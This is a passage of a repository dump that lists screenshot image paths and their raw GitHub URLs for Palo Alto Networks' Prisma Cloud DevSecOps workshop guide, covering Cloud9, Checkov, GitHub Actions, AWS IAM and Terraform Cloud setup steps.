https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-create-env.png


--------------------------------------------------------------------------------
/guide/images/c9-env-options1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-env-options1.png


--------------------------------------------------------------------------------
/guide/images/c9-env-options2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-env-options2.png


--------------------------------------------------------------------------------
/guide/images/c9-env-options3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-env-options3.png


--------------------------------------------------------------------------------
/guide/images/c9-git-clone.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-git-clone.png


--------------------------------------------------------------------------------
/guide/images/c9-install-checkov.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-install-checkov.png


--------------------------------------------------------------------------------
/guide/images/c9-open-ide.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-open-ide.png


--------------------------------------------------------------------------------
/guide/images/c9-open-term.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-open-term.png


--------------------------------------------------------------------------------
/guide/images/c9-py-venv.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/c9-py-venv.png


--------------------------------------------------------------------------------
/guide/images/checkov-custom-checks.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/checkov-custom-checks.png


--------------------------------------------------------------------------------
/guide/images/checkov-result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/checkov-result.png


--------------------------------------------------------------------------------
/guide/images/checkov-secrets.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/checkov-secrets.png


--------------------------------------------------------------------------------
/guide/images/devsecops-workflow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/devsecops-workflow.png


--------------------------------------------------------------------------------
/guide/images/ee-creds.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/ee-creds.png


--------------------------------------------------------------------------------
/guide/images/ee-login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/ee-login.png


--------------------------------------------------------------------------------
/guide/images/ee-sign-in.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/ee-sign-in.png


--------------------------------------------------------------------------------
/guide/images/gh-action-commit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-action-commit.png


--------------------------------------------------------------------------------
/guide/images/gh-action-edit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-action-edit.png


--------------------------------------------------------------------------------
/guide/images/gh-actions-new-workflow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-actions-new-workflow.png


--------------------------------------------------------------------------------
/guide/images/gh-actions-results.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-actions-results.png


--------------------------------------------------------------------------------
/guide/images/gh-actions-tab.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-actions-tab.png


--------------------------------------------------------------------------------
/guide/images/gh-actions-workflows.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-actions-workflows.png


--------------------------------------------------------------------------------
/guide/images/gh-blocked-pr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-blocked-pr.png


--------------------------------------------------------------------------------
/guide/images/gh-bp-rule.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-bp-rule.png


--------------------------------------------------------------------------------
/guide/images/gh-branch-protection.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-branch-protection.png


--------------------------------------------------------------------------------
/guide/images/gh-clone.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-clone.png


--------------------------------------------------------------------------------
/guide/images/gh-commit-directly.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-commit-directly.png


--------------------------------------------------------------------------------
/guide/images/gh-commit-s3-change.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-commit-s3-change.png


--------------------------------------------------------------------------------
/guide/images/gh-create-fork.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-create-fork.png


--------------------------------------------------------------------------------
/guide/images/gh-create-pr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-create-pr.png


--------------------------------------------------------------------------------
/guide/images/gh-edit-checkov.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-edit-checkov.png


--------------------------------------------------------------------------------
/guide/images/gh-edit-s3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-edit-s3.png


--------------------------------------------------------------------------------
/guide/images/gh-fork.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-fork.png


--------------------------------------------------------------------------------
/guide/images/gh-merge-pr-fix.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-merge-pr-fix.png


--------------------------------------------------------------------------------
/guide/images/gh-new-file.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-new-file.png


--------------------------------------------------------------------------------
/guide/images/gh-open-pr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-open-pr.png


--------------------------------------------------------------------------------
/guide/images/gh-pr-fix1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-pr-fix1.png


--------------------------------------------------------------------------------
/guide/images/gh-pr-fix2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-pr-fix2.png


--------------------------------------------------------------------------------
/guide/images/gh-pr-merge.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-pr-merge.png


--------------------------------------------------------------------------------
/guide/images/gh-pr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-pr.png


--------------------------------------------------------------------------------
/guide/images/gh-prisma-comments.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-prisma-comments.png


--------------------------------------------------------------------------------
/guide/images/gh-propose-changes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-propose-changes.png


--------------------------------------------------------------------------------
/guide/images/gh-secret-created.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-secret-created.png


--------------------------------------------------------------------------------
/guide/images/gh-security-results.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-security-results.png


--------------------------------------------------------------------------------
/guide/images/gh-select-repos.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-select-repos.png


--------------------------------------------------------------------------------
/guide/images/ghas-code-scanning-results.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/ghas-code-scanning-results.png


--------------------------------------------------------------------------------
/guide/images/ghas-overview.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/ghas-overview.png


--------------------------------------------------------------------------------
/guide/images/github-create-secret.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/github-create-secret.png


--------------------------------------------------------------------------------
/guide/images/github-repo-secret.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/github-repo-secret.png


--------------------------------------------------------------------------------
/guide/images/github-secrets.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/github-secrets.png


--------------------------------------------------------------------------------
/guide/images/iam-console-home.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-console-home.png


--------------------------------------------------------------------------------
/guide/images/iam-create-key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-create-key.png


--------------------------------------------------------------------------------
/guide/images/iam-create-user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-create-user.png


--------------------------------------------------------------------------------
/guide/images/iam-dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-dashboard.png


--------------------------------------------------------------------------------
/guide/images/iam-key-created.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-key-created.png


--------------------------------------------------------------------------------
/guide/images/iam-key-options.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-key-options.png


--------------------------------------------------------------------------------
/guide/images/iam-key-tag-and-create.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-key-tag-and-create.png


--------------------------------------------------------------------------------
/guide/images/iam-retrieve-key-data.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-retrieve-key-data.png


--------------------------------------------------------------------------------
/guide/images/iam-review-create.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-review-create.png


--------------------------------------------------------------------------------
/guide/images/iam-set-perms.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-set-perms.png


--------------------------------------------------------------------------------
/guide/images/iam-user-details.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-user-details.png


--------------------------------------------------------------------------------
/guide/images/prisma-access-control.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-access-control.png


--------------------------------------------------------------------------------
/guide/images/prisma-access-key-created.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-access-key-created.png


--------------------------------------------------------------------------------
/guide/images/prisma-appsec-home.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-appsec-home.png


--------------------------------------------------------------------------------
/guide/images/prisma-appsec-projects.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-appsec-projects.png


--------------------------------------------------------------------------------
/guide/images/prisma-aws-added.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-aws-added.png


--------------------------------------------------------------------------------
/guide/images/prisma-aws1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-aws1.png


--------------------------------------------------------------------------------
/guide/images/prisma-aws2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-aws2.png


--------------------------------------------------------------------------------
/guide/images/prisma-aws3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-aws3.png


--------------------------------------------------------------------------------
/guide/images/prisma-aws4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-aws4.png


--------------------------------------------------------------------------------
/guide/images/prisma-cfn-output.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-cfn-output.png


--------------------------------------------------------------------------------
/guide/images/prisma-cfn.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-cfn.png


--------------------------------------------------------------------------------
/guide/images/prisma-checkov-api-key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-checkov-api-key.png


--------------------------------------------------------------------------------
/guide/images/prisma-checkov-results.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-checkov-results.png


--------------------------------------------------------------------------------
/guide/images/prisma-cicd-risks.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-cicd-risks.png


--------------------------------------------------------------------------------
/guide/images/prisma-cloud-account.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-cloud-account.png


--------------------------------------------------------------------------------
/guide/images/prisma-code-build-providers.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-code-build-providers.png


--------------------------------------------------------------------------------
/guide/images/prisma-connect-providers.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-connect-providers.png


--------------------------------------------------------------------------------
/guide/images/prisma-create-access-key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-create-access-key.png


--------------------------------------------------------------------------------
/guide/images/prisma-csp-onboarding.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-csp-onboarding.png


--------------------------------------------------------------------------------
/guide/images/prisma-dashboard-code.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-dashboard-code.png


--------------------------------------------------------------------------------
/guide/images/prisma-drift-result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-drift-result.png


--------------------------------------------------------------------------------
/guide/images/prisma-enforcement-rules.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-enforcement-rules.png


--------------------------------------------------------------------------------
/guide/images/prisma-enforcement-rules1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-enforcement-rules1.png


--------------------------------------------------------------------------------
/guide/images/prisma-enforcement-rules2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-enforcement-rules2.png


--------------------------------------------------------------------------------
/guide/images/prisma-enforcement-rules3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-enforcement-rules3.png


--------------------------------------------------------------------------------
/guide/images/prisma-gh-app-results.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-gh-app-results.png


--------------------------------------------------------------------------------
/guide/images/prisma-gh-app.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-gh-app.png


--------------------------------------------------------------------------------
/guide/images/prisma-gh-auth.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-gh-auth.png


--------------------------------------------------------------------------------
/guide/images/prisma-gh-done.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-gh-done.png


--------------------------------------------------------------------------------
/guide/images/prisma-gha-results.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-gha-results.png


--------------------------------------------------------------------------------
/guide/images/prisma-inventory.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-inventory.png


--------------------------------------------------------------------------------
/guide/images/prisma-pr-fix1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-pr-fix1.png


--------------------------------------------------------------------------------
/guide/images/prisma-pr-fix2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-pr-fix2.png


--------------------------------------------------------------------------------
/guide/images/prisma-providers.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-providers.png


--------------------------------------------------------------------------------
/guide/images/prisma-sbom.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-sbom.png


--------------------------------------------------------------------------------
/guide/images/prisma-select-repos.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-select-repos.png


--------------------------------------------------------------------------------
/guide/images/prisma-tfc-done.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-tfc-done.png


--------------------------------------------------------------------------------
/guide/images/prisma-tfc-org.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-tfc-org.png


--------------------------------------------------------------------------------
/guide/images/prisma-tfc-rt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-tfc-rt.png


--------------------------------------------------------------------------------
/guide/images/prisma-tfc-token.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-tfc-token.png


--------------------------------------------------------------------------------
/guide/images/prisma-tfc-workspace.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-tfc-workspace.png


--------------------------------------------------------------------------------
/guide/images/prisma-traced-resource-policies.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-traced-resource-policies.png


--------------------------------------------------------------------------------
/guide/images/prisma-welcome.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-welcome.png


--------------------------------------------------------------------------------
/guide/images/tfc-add-github.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-add-github.png


--------------------------------------------------------------------------------
/guide/images/tfc-add-repo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-add-repo.png


--------------------------------------------------------------------------------
/guide/images/tfc-apply-run.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-apply-run.png


--------------------------------------------------------------------------------
/guide/images/tfc-apply.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-apply.png


--------------------------------------------------------------------------------
/guide/images/tfc-configure-variables.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-configure-variables.png


